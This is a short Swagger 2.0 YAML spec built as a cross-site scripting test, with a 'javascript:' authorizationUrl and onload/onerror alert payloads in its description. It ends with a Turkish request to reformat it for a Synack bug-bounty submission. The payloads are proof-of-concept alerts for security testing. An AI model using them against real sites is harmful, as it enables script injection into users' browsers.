swagger: '2.0'
securityDefinitions:
a:
type: oauth2
authorizationUrl: javascript:alert(document.domain)//
info:
version: "1.0.0"
title: XSS img test
description: onload="alert(1)" <img/src=x/onerror="alert(1)"> onerror="alert(3)">
paths:
/:
get:
responses:
200:
description: Successful response

bu koda synack'in istediği şekile çevir. bug boun yapıyorum hızlı ol
